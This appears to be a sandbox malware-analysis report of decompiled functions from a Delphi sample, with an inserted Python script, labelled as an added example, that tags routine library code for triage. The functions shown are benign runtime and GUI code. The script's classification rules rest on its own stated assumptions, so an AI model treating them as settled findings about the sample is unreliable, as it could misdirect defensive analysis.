      • Opcode Fuzzy Hash: ca15dc53f8cda0c17e908ae54ccc02ddcd155d54cacbe03960d6ea68ad4c276b
      • Instruction Fuzzy Hash: D751CD70A042409BDB68BB2B8885B5A37959F40309F0845BBFD44EB397CA7CDE4CC799
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 48%
      			E00485D60(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
      				intOrPtr _v8;
      				char _v12;
      				char _v16;
      				char _v20;
      				char _v1044;
      				char _v1098;
      				char _v1104;
      				void* _t34;
      				char* _t38;
      				intOrPtr* _t47;
      				void* _t54;
      				intOrPtr _t63;
      				void* _t69;
      				void* _t70;
      				intOrPtr _t71;
      				void* _t72;
      
      				_t74 = __fp0;
      				_t65 = __edi;
      				_t69 = _t70;
      				_t71 = _t70 + 0xfffffbb4;
      				_push(__ebx);
      				_push(__esi);
      				_v1104 = 0;
      				_v12 = 0;
      				_v8 = __eax;
      				_push(_t69);
      				_push(0x485e98);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t71;
      				_push(_t69);
      				_push(0x485e70);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t71;
      				_t72 =  *((intOrPtr*)(_v8 + 0x44)) - 1;
      				if(_t72 < 0) {
      					_v16 = 0;
      					_t54 = 0;
      					do {
      						E004091E4( &_v1104);
      						E00404D4C( &_v12, _v1104, 0x485ec4);
      						_push(1);
      						_t34 = E00404F00(_v12);
      						_t67 = _t34;
      						_push(_t34);
      						_push(0);
      						_push(0);
      						_push( &_v1098);
      						_push( &_v20);
      						_push(0x400);
      						_push( &_v1044);
      						_t38 =  &_v16;
      						_push(_t38);
      						L00465E04();
      						if(_t38 == 0) {
      							if(_v16 != 0) {
      								_push( &_v16);
      								L00465DCC();
      								_v16 = 0;
      							}
      							E0047C854(_t54, _t65, _t67, _t74, 0xa,  *((intOrPtr*)(_v8 + 0x40)), 0, _t67);
      						}
      						_t54 = _t54 + 1;
      					} while (_t54 != 0x15);
      					L9:
      					_pop(_t63);
      					 *[fs:eax] = _t63;
      					_push(0x485e77);
      					return E00422604(_v8);
      				}
      				if(_t72 == 0) {
      					_t47 =  *0x48f538; // 0x490c50
      					E0047FD7C( *_t47, __ebx, 0, "FindDevice", __edi, __esi, __fp0);
      					_push( *((intOrPtr*)(_v8 + 0x40)));
      					_push(E0047C854);
      					_push(0);
      					_push(5);
      					L00465ECC();
      				}
      				goto L9;
      			}


      APIs
      • StarBurn_FindDevice.STARBURN(00000005,00000000,Function_0007C854,?,00000000,00485E70,?,00000000,00485E98), ref: 00485DC9
      • StarBurn_CdvdBurnerGrabber_CreateEx.STARBURN(?,?,00000400,?,?,00000000,00000000,00000000,00000001,00000000,00485E70,?,00000000,00485E98), ref: 00485E26
      • StarBurn_Destroy.STARBURN(00000000,?,?,00000400,?,?,00000000,00000000,00000000,00000001,00000000,00485E70,?,00000000,00485E98), ref: 00485E39
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_Star$BurnerCdvdCreateDestroyDeviceFindGrabber_
      • String ID: CdRom$FindDevice
      • API String ID: 3375253413-715927625
      • Opcode ID: 3dc1cae661a1b3e644fb63b90f2776a5c903fe8f746edbde0865b73b00b9a3d8
      • Instruction ID: 9020ce5f36a88ee8ae574699db8ee35f6f41434bcadca601374072c812b48805
      • Opcode Fuzzy Hash: 3dc1cae661a1b3e644fb63b90f2776a5c903fe8f746edbde0865b73b00b9a3d8
      • Instruction Fuzzy Hash: 1F318475A00608AFDB10EFA5CC81FEE77B8EB49704F1184BAF604E7291D6789E44CB59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 75%
      			E0047AA10(char __edx, void* __edi, void* __fp0) {
      				char _v5;
      				void* __ecx;
      				void* __ebp;
      				intOrPtr* _t14;
      				intOrPtr _t24;
      				char _t28;
      				intOrPtr* _t29;
      				intOrPtr* _t35;
      				char _t40;
      				void* _t45;
      				intOrPtr _t47;
      				struct HINSTANCE__* _t48;
      				void* _t49;
      				void* _t50;
      				void* _t57;
      
      				_t57 = __fp0;
      				_t45 = __edi;
      				_t40 = __edx;
      				if(__edx != 0) {
      					_t50 = _t50 + 0xfffffff0;
      					_t14 = E00403F68(_t14, _t49);
      				}
      				_v5 = _t40;
      				_t35 = _t14;
      				E0046ECD4(0x200);
      				E00436844(0, _t45, _t57);
      				 *((intOrPtr*)(_t35 + 0x278)) = E0045B61C(0x47aeb0, _t35);
      				E0047B588(_t35, 1);
      				 *((intOrPtr*)( *_t35 + 0x10c))();
      				_t24 =  *((intOrPtr*)(_t35 + 0x23c));
      				 *((intOrPtr*)(_t24 + 0x10)) = _t35;
      				 *((intOrPtr*)(_t35 + 0x28c)) =  *((intOrPtr*)(_t24 + 0x14));
      				_t47 = E00403BC0(1);
      				 *((intOrPtr*)(_t35 + 0x27c)) = _t47;
      				 *((intOrPtr*)(_t47 + 0xc)) = _t35;
      				 *((intOrPtr*)(_t47 + 8)) = 0x47ad0c;
      				 *((char*)(_t35 + 0x289)) = 0;
      				_t28 =  *0x47ab18; // 0x2
      				 *((char*)(_t35 + 0x26c)) = _t28;
      				if( *0x490c24 == 0) {
      					 *0x490c24 = 1;
      					_t48 = GetModuleHandleA("ole32.dll");
      					if(_t48 != 0) {
      						 *0x490c20 = GetProcAddress(_t48, "CoInitializeEx");
      					}
      				}
      				if( *0x490c20 == 0) {
      					_push(0);
      					L00416C2C();
      				} else {
      					 *0x490c20(0, 2);
      				}
      				_t29 = _t35;
      				if(_v5 != 0) {
      					E00403FC0(_t29);
      					_pop( *[fs:0x0]);
      				}
      				return _t35;
      			}

      Addresses (one per line of the C-Code body above, in order):
      0x0047aa10
      0x0047aa10
      0x0047aa10
      0x0047aa18
      0x0047aa1a
      0x0047aa1d
      0x0047aa1d
      0x0047aa24
      0x0047aa27
      0x0047aa2e
      0x0047aa39
      0x0047aa49
      0x0047aa58
      0x0047aa63
      0x0047aa69
      0x0047aa6f
      0x0047aa75
      0x0047aa87
      0x0047aa89
      0x0047aa8f
      0x0047aa92
      0x0047aa99
      0x0047aaa0
      0x0047aaa5
      0x0047aab2
      0x0047aab4
      0x0047aac5
      0x0047aac9
      0x0047aad6
      0x0047aad6
      0x0047aac9
      0x0047aae2
      0x0047aaf0
      0x0047aaf2
      0x0047aae4
      0x0047aae8
      0x0047aae8
      0x0047aaf7
      0x0047aafd
      0x0047aaff
      0x0047ab04
      0x0047ab0b
      0x0047ab14

      APIs
      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 0047AAC0
      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 0047AAD1
      • CoInitialize.OLE32(00000000), ref: 0047AAF2
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressHandleInitializeModuleProc
      • String ID: CoInitializeEx$ole32.dll
      • API String ID: 3965314501-4163290989
      • Opcode ID: f9610e9864207c41553b23f7a7d49b256a86f7c090fe6a4b78199707071065b5
      • Instruction ID: 7b073a38b1ee5512eb0d308035bc425582344909d9c14bd0c412381b1404ed62
      • Opcode Fuzzy Hash: f9610e9864207c41553b23f7a7d49b256a86f7c090fe6a4b78199707071065b5
      • Instruction Fuzzy Hash: 7D21E5306052409FD304AF3D98897897BD0AB59308F14857FE84C9B397DAB99C04CB6E
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 93%
      			E0042384C(intOrPtr _a4, short _a6, intOrPtr _a8) {
      				struct _WNDCLASSA _v44;
      				struct HINSTANCE__* _t6;
      				CHAR* _t8;
      				struct HINSTANCE__* _t9;
      				int _t10;
      				void* _t11;
      				struct HINSTANCE__* _t13;
      				struct HINSTANCE__* _t19;
      				CHAR* _t20;
      				struct HWND__* _t22;
      				CHAR* _t24;
      
      				_t6 =  *0x490664; // 0x400000
      				 *0x48e4ac = _t6;
      				_t8 =  *0x48e4c0; // 0x42383c
      				_t9 =  *0x490664; // 0x400000
      				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
      				asm("sbb eax, eax");
      				_t11 = _t10 + 1;
      				if(_t11 == 0 || L00407550 != _v44.lpfnWndProc) {
      					if(_t11 != 0) {
      						_t19 =  *0x490664; // 0x400000
      						_t20 =  *0x48e4c0; // 0x42383c
      						UnregisterClassA(_t20, _t19);
      					}
      					RegisterClassA(0x48e49c);
      				}
      				_t13 =  *0x490664; // 0x400000
      				_t24 =  *0x48e4c0; // 0x42383c
      				_t22 = E00407ACC(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
      				if(_a6 != 0) {
      					SetWindowLongA(_t22, 0xfffffffc, E00423758(_a4, _a8));
      				}
      				return _t22;
      			}

      Addresses (one per line of the C-Code body above, in order):
      0x00423853
      0x00423858
      0x00423861
      0x00423867
      0x0042386d
      0x00423875
      0x00423877
      0x0042387a
      0x00423888
      0x0042388a
      0x00423890
      0x00423896
      0x00423896
      0x004238a0
      0x004238a0
      0x004238b6
      0x004238c3
      0x004238d3
      0x004238da
      0x004238eb
      0x004238eb
      0x004238f6

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Class$InfoLongRegisterUnregisterWindow
      • String ID: <8B
      • API String ID: 4025006896-1568496033
      • Opcode ID: 1f814bfd6048da7cc461f75fa6d4946ef528de129486f71893ed62e8101acf9c
      • Instruction ID: 420f45fd13801531c3d67010627692b035290d1057c6f930145b2669d5602726
      • Opcode Fuzzy Hash: 1f814bfd6048da7cc461f75fa6d4946ef528de129486f71893ed62e8101acf9c
      • Instruction Fuzzy Hash: E3015E72B042046FDB00EF5AAC81F5A33A8AB58715F504A3AF608EB2E1D639ED14875D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 65%
      			E00403A5C() {
      				void* _v8;
      				char _v12;
      				int _v16;
      				signed short _t12;
      				signed short _t14;
      				intOrPtr _t27;
      				void* _t29;
      				void* _t31;
      				intOrPtr _t32;
      
      				_t29 = _t31;
      				_t32 = _t31 + 0xfffffff4;
      				_v12 =  *0x48e020 & 0x0000ffff;
      				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
      					_t12 =  *0x48e020; // 0x1372
      					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
      					 *0x48e020 = _t14;
      					return _t14;
      				} else {
      					_push(_t29);
      					_push(E00403ACD);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t32;
      					_v16 = 4;
      					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
      					_pop(_t27);
      					 *[fs:eax] = _t27;
      					_push(0x403ad4);
      					return RegCloseKey(_v8);
      				}
      			}

      Addresses (one per line of the C-Code body above, in order):
      0x00403a5d
      0x00403a5f
      0x00403a69
      0x00403a85
      0x00403ad4
      0x00403ae6
      0x00403ae9
      0x00403af2
      0x00403a87
      0x00403a89
      0x00403a8a
      0x00403a8f
      0x00403a92
      0x00403a95
      0x00403ab1
      0x00403ab8
      0x00403abb
      0x00403abe
      0x00403acc
      0x00403acc

      APIs
      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
      • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
      • RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CloseOpenQueryValue
      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
      • API String ID: 3677997916-4173385793
      • Opcode ID: bcf38888f88c271f0d3ae7e0a76ad53aed03b07e407fdf46e4afd9d5facd449b
      • Instruction ID: c1c799c41c43bef3537b13398d514e3d0a6f6023418515aed053cb9496fee5ee
      • Opcode Fuzzy Hash: bcf38888f88c271f0d3ae7e0a76ad53aed03b07e407fdf46e4afd9d5facd449b
      • Instruction Fuzzy Hash: 12015675A50308BAE711EF91CC42BA977ACE709B05F200876B900E65D1E7B96A10CB5C
      Uniqueness

      Uniqueness Score: -1.00%
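
      The APIs sections of the records on this page share one line format: `Name.MODULE(args), ref: address`, with a `Part of subcall function XXXXXXXX:` prefix for calls made inside a callee, and a bare hex name such as `73BEAC10.USER32` (in E00442288 further down) when the report could not resolve the callee. Two of the functions above are runtime boilerplate rather than sample-specific logic: E00403A5C reads HKLM\SOFTWARE\Borland\Delphi\RTL\FPUMaskValue, which the Delphi RTL does at start-up to set the FPU control word, and E0047AA10 resolves CoInitializeEx from ole32.dll at run time and falls back to CoInitialize. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses those annotation lines and tags each function so known library code can be pushed down the review queue. The sample records are excerpted from the APIs sections on this page; the tag names, the assumption that the CoInitializeEx resolution is VCL application start-up code rather than an evasion technique, and the tag-to-verdict mapping are the example's own.

```python
"""Tag Joe Sandbox function records as runtime boilerplate or as code needing review,
from the 'APIs' annotation lines. Added example, not part of the report; the tag
names and rules are this example's own assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# One annotation line as printed in the report, e.g.
#   • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 0047AAD1
#   • GetCurrentThreadId.KERNEL32 ref: 0044237E
#   • Part of subcall function 004426D8: GetParent.USER32(00000000), ref: 004426F5
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[0-9A-Za-z_]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# A callee the report could not name is printed as a bare 8-digit hex address
# ("73BEAC10.USER32"); those must be resolved by hand against the dump.
UNRESOLVED_NAME = re.compile(r"^[0-9A-Fa-f]{8}$")
# Registry key the Delphi RTL reads at start-up to configure the FPU control word.
DELPHI_RTL_KEY = r"SOFTWARE\Borland\Delphi\RTL"
# Tags meaning "known runtime code": deprioritise, do not ignore (assumption).
BOILERPLATE_TAGS = {"delphi-rtl-fpu-mask", "delphi-vcl-com-init"}


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: int                   # call-site address
    subcall_of: Optional[int]  # callee containing the call, for "Part of subcall" lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return the ApiCall records found in a block of report text, in order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings, 'Strings', dump-source lines, blanks
        raw_args, sub = m.group("args"), m.group("sub")
        calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module").upper(),
            args=tuple(raw_args.split(",")) if raw_args else (),
            ref=int(m.group("ref"), 16),
            subcall_of=int(sub, 16) if sub else None,
        ))
    return calls


def classify(calls: List[ApiCall]) -> Set[str]:
    """Tag a function from its API calls; tag names are this example's own."""
    tags: Set[str] = set()
    names = {c.name for c in calls}
    args = [a for c in calls for a in c.args]
    # Delphi RTL: HKLM\SOFTWARE\Borland\Delphi\RTL\FPUMaskValue lookup (E00403A5C).
    if any(DELPHI_RTL_KEY in a for a in args) or "FPUMaskValue" in args:
        tags.add("delphi-rtl-fpu-mask")
    # CoInitializeEx resolved from ole32.dll at run time, CoInitialize as fallback
    # (E0047AA10); assumed to be VCL application start-up code, not evasion.
    if "GetProcAddress" in names and "CoInitializeEx" in args and "ole32.dll" in args:
        tags.add("delphi-vcl-com-init")
    if any(UNRESOLVED_NAME.match(c.name) for c in calls):
        tags.add("unresolved-import")
    return tags


def triage(records: Dict[str, str]) -> Dict[str, str]:
    """Map function name -> verdict for {function: text of its APIs section}."""
    verdicts = {}
    for func, text in records.items():
        tags = classify(parse_api_lines(text))
        if "unresolved-import" in tags:
            verdicts[func] = "review-unresolved-callee"
        elif tags and tags <= BOILERPLATE_TAGS:
            verdicts[func] = "library-boilerplate"
        else:
            verdicts[func] = "review"  # no tag, or a non-boilerplate tag
    return verdicts


# Sample input: APIs sections excerpted from the records on this page.
SAMPLE_RECORDS = {
    "E0047AA10": """
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 0047AAC0
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 0047AAD1
• CoInitialize.OLE32(00000000), ref: 0047AAF2
""",
    "E00403A5C": r"""
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
""",
    "E00442288": """
  • Part of subcall function 004426D8: WindowFromPoint.USER32(004424B2,00490B20,00000000,004422A2,?,-0000000C,?), ref: 004426DE
  • Part of subcall function 004426D8: GetParent.USER32(00000000), ref: 004426F5
• GetWindow.USER32(00000000,00000004), ref: 004422AA
• GetCurrentThreadId.KERNEL32 ref: 0044237E
• 73BEAC10.USER32(00000000,0044221C,?,00000000,00000004,?,-0000000C,?), ref: 00442384
""",
}
```

      A function whose APIs section is empty (E0042384C above) gets no tags and lands in `review`, so the verdicts order the reading of the decompiled code; they do not replace it. Add rules to `classify` only for patterns confirmed against the C-Code, and treat an `unresolved-import` hit as a prompt to resolve the callee from the call-site arguments and the dump before deciding anything about the function.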

      C-Code - Quality: 90%
      			E0045D2A0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr* _v8;
      				int _t100;
      				int _t102;
      				intOrPtr _t119;
      				int _t124;
      				intOrPtr _t157;
      				signed char _t165;
      				signed char _t166;
      				void* _t168;
      				signed char _t183;
      				intOrPtr _t185;
      				intOrPtr _t197;
      				void* _t200;
      				void* _t202;
      				int _t203;
      				intOrPtr _t207;
      				void* _t209;
      				signed char _t210;
      
      				_t200 = __edi;
      				_t206 = _t207;
      				_t202 = __edx;
      				_v8 = __eax;
      				E004479C0(_v8);
      				_push(_t207);
      				_push(0x45d508);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t207;
      				 *(_v8 + 0x268) = 0;
      				 *(_v8 + 0x26c) = 0;
      				 *(_v8 + 0x270) = 0;
      				_t168 = 0;
      				_t209 = E00403B7C( *_v8) -  *0x45a110; // 0x45a15c
      				if(_t209 == 0) {
      					_t165 =  *0x490661; // 0x0
      					_t166 = _t165 ^ 0x00000001;
      					_t210 = _t166;
      					 *(_v8 + 0x234) = _t166;
      				}
      				E0044711C(_v8, _t168, _t202, _t210);
      				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
      					L14:
      					_t100 =  *(_v8 + 0x268);
      					_t219 = _t100;
      					if(_t100 > 0) {
      						E00444344(_v8, _t100, _t219);
      					}
      					_t102 =  *(_v8 + 0x26c);
      					_t220 = _t102;
      					if(_t102 > 0) {
      						E00444388(_v8, _t102, _t220);
      					}
      					_t183 =  *0x45d514; // 0x0
      					 *(_v8 + 0x98) = _t183;
      					_t221 = _t168;
      					if(_t168 == 0) {
      						E0045C900(_v8, 1, 1);
      						E0044AC1C(_v8, 1, 1, _t221);
      					}
      					E00445AE8(_v8, 0, 0xb03d, 0);
      					_pop(_t185);
      					 *[fs:eax] = _t185;
      					_push(0x45d50f);
      					return E004479C8(_v8);
      				} else {
      					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
      						_t197 =  *0x490b80; // 0x2480e74
      						_t23 = _t197 + 0x40; // 0x60
      						if( *(_v8 + 0x25c) !=  *_t23) {
      							_t157 =  *0x490b80; // 0x2480e74
      							_t26 = _t157 + 0x40; // 0x60
      							E00425D14( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00425D0C( *((intOrPtr*)(_v8 + 0x68))),  *_t26,  *(_v8 + 0x25c)), _t200, _t206);
      						}
      					}
      					_t119 =  *0x490b80; // 0x2480e74
      					_t29 = _t119 + 0x40; // 0x60
      					 *(_v8 + 0x25c) =  *_t29;
      					_t203 = E0045D638(_v8);
      					_t124 =  *(_v8 + 0x270);
      					_t215 = _t203 - _t124;
      					if(_t203 != _t124) {
      						_t168 = 1;
      						E0045C900(_v8, _t124, _t203);
      						E0044AC1C(_v8,  *(_v8 + 0x270), _t203, _t215);
      						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
      							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t203,  *(_v8 + 0x270));
      						}
      						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
      							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t203,  *(_v8 + 0x270));
      						}
      						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
      							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t203,  *(_v8 + 0x270));
      							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t203,  *(_v8 + 0x270));
      						}
      					}
      					goto L14;
      				}
      			}

      Addresses (one per line of the C-Code body above, in order):
      0x0045d2a0
      0x0045d2a1
      0x0045d2a6
      0x0045d2a8
      0x0045d2ae
      0x0045d2b5
      0x0045d2b6
      0x0045d2bb
      0x0045d2be
      0x0045d2c6
      0x0045d2d1
      0x0045d2dc
      0x0045d2e2
      0x0045d2ee
      0x0045d2f4
      0x0045d2f6
      0x0045d2fb
      0x0045d2fb
      0x0045d300
      0x0045d300
      0x0045d30b
      0x0045d31a
      0x0045d47c
      0x0045d47f
      0x0045d485
      0x0045d487
      0x0045d48e
      0x0045d48e
      0x0045d496
      0x0045d49c
      0x0045d49e
      0x0045d4a5
      0x0045d4a5
      0x0045d4ad
      0x0045d4b3
      0x0045d4b9
      0x0045d4bb
      0x0045d4ca
      0x0045d4dc
      0x0045d4dc
      0x0045d4ed
      0x0045d4f4
      0x0045d4f7
      0x0045d4fa
      0x0045d507
      0x0045d330
      0x0045d33a
      0x0045d345
      0x0045d34b
      0x0045d34e
      0x0045d35a
      0x0045d35f
      0x0045d37a
      0x0045d37a
      0x0045d34e
      0x0045d37f
      0x0045d384
      0x0045d38a
      0x0045d398
      0x0045d39d
      0x0045d3a3
      0x0045d3a5
      0x0045d3ab
      0x0045d3b4
      0x0045d3c7
      0x0045d3d6
      0x0045d3f5
      0x0045d3f5
      0x0045d405
      0x0045d424
      0x0045d424
      0x0045d434
      0x0045d453
      0x0045d476
      0x0045d476
      0x0045d434
      0x00000000
      0x0045d3a5

      APIs
      • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 0045D371
      • MulDiv.KERNEL32(?,00000000,00000000), ref: 0045D3ED
      • MulDiv.KERNEL32(?,00000000,00000000), ref: 0045D41C
      • MulDiv.KERNEL32(?,00000000,00000000), ref: 0045D44B
      • MulDiv.KERNEL32(?,00000000,00000000), ref: 0045D46E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9a70bdd5f2eb97b6914e008b1ef6983fbb90842f2c19c8f7c75e119c60eb4503
      • Instruction ID: 074e843880fe2dc0be29ea3aaec3898d0ef650849bcbe0301b3c535a4197778e
      • Opcode Fuzzy Hash: 9a70bdd5f2eb97b6914e008b1ef6983fbb90842f2c19c8f7c75e119c60eb4503
      • Instruction Fuzzy Hash: 3D71E574A04104EFDB10DBA9C589EAEB7F5AF49304F2541F6E808EB362D739AE459B04
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 85%
      			E00454D8C(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				void* _v16;
      				struct tagRECT _v32;
      				void* _t53;
      				int _t63;
      				CHAR* _t65;
      				void* _t76;
      				void* _t78;
      				int _t89;
      				CHAR* _t91;
      				int _t117;
      				intOrPtr _t127;
      				void* _t139;
      				void* _t144;
      				char _t153;
      
      				_t120 = __ecx;
      				_t143 = _t144;
      				_v16 = 0;
      				_v12 = __ecx;
      				_v8 = __edx;
      				_t139 = __eax;
      				_t117 = _a4;
      				_push(_t144);
      				_push(0x454f70);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t144 + 0xffffffe4;
      				_t53 = E00456D64(__eax);
      				_t135 = _t53;
      				if(_t53 != 0 && E004583D0(_t135) != 0) {
      					if((_t117 & 0x00000000) != 0) {
      						__eflags = (_t117 & 0x00000002) - 2;
      						if((_t117 & 0x00000002) == 2) {
      							_t117 = _t117 & 0xfffffffd;
      							__eflags = _t117;
      						}
      					} else {
      						_t117 = _t117 & 0xffffffff | 0x00000002;
      					}
      					_t117 = _t117 | 0x00020000;
      				}
      				E00404AD8( &_v16, _v12);
      				if((_t117 & 0x00000004) == 0) {
      					L12:
      					E00404E4C(_v16, 0x454f94);
      					if(_t153 != 0) {
      						E00426414( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
      						__eflags =  *((char*)(_t139 + 0x3a));
      						if( *((char*)(_t139 + 0x3a)) != 0) {
      							_t136 =  *((intOrPtr*)(_v8 + 0xc));
      							__eflags = E00425DEC( *((intOrPtr*)(_v8 + 0xc))) |  *0x454f98;
      							E00425DF8( *((intOrPtr*)(_v8 + 0xc)), E00425DEC( *((intOrPtr*)(_v8 + 0xc))) |  *0x454f98, _t136, _t139, _t143);
      						}
      						__eflags =  *((char*)(_t139 + 0x39));
      						if( *((char*)(_t139 + 0x39)) != 0) {
      							L24:
      							_t63 = E00404D00(_v16);
      							_t65 = E00404F00(_v16);
      							DrawTextA(E00426B00(_v8), _t65, _t63, _a12, _t117);
      							L25:
      							_pop(_t127);
      							 *[fs:eax] = _t127;
      							_push(0x454f77);
      							return E00404A40( &_v16);
      						} else {
      							__eflags = _a8;
      							if(_a8 == 0) {
      								OffsetRect(_a12, 1, 1);
      								E00425B2C( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
      								_t89 = E00404D00(_v16);
      								_t91 = E00404F00(_v16);
      								DrawTextA(E00426B00(_v8), _t91, _t89, _a12, _t117);
      								OffsetRect(_a12, 0xffffffff, 0xffffffff);
      							}
      							__eflags = _a8;
      							if(_a8 == 0) {
      								L23:
      								E00425B2C( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
      							} else {
      								_t76 = E0042566C(0xff00000d);
      								_t78 = E0042566C(0xff000010);
      								__eflags = _t76 - _t78;
      								if(_t76 != _t78) {
      									goto L23;
      								}
      								E00425B2C( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
      							}
      							goto L24;
      						}
      					}
      					if((_t117 & 0x00000004) == 0) {
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						_v32.top = _v32.top + 4;
      						DrawEdge(E00426B00(_v8),  &_v32, 6, 2);
      					}
      					goto L25;
      				} else {
      					if(_v16 == 0) {
      						L11:
      						E00404D08( &_v16, 0x454f88);
      						goto L12;
      					}
      					if( *_v16 != 0x26) {
      						goto L12;
      					}
      					_t153 =  *((char*)(_v16 + 1));
      					if(_t153 != 0) {
      						goto L12;
      					}
      					goto L11;
      				}
      			}

      Addresses (one per line of the C-Code body above, in order):
      0x00454d8c
      0x00454d8d
      0x00454d97
      0x00454d9a
      0x00454d9d
      0x00454da0
      0x00454da2
      0x00454da7
      0x00454da8
      0x00454dad
      0x00454db0
      0x00454db5
      0x00454dba
      0x00454dbe
      0x00454dce
      0x00454ddd
      0x00454de0
      0x00454de5
      0x00454de5
      0x00454de5
      0x00454dd0
      0x00454dd3
      0x00454dd3
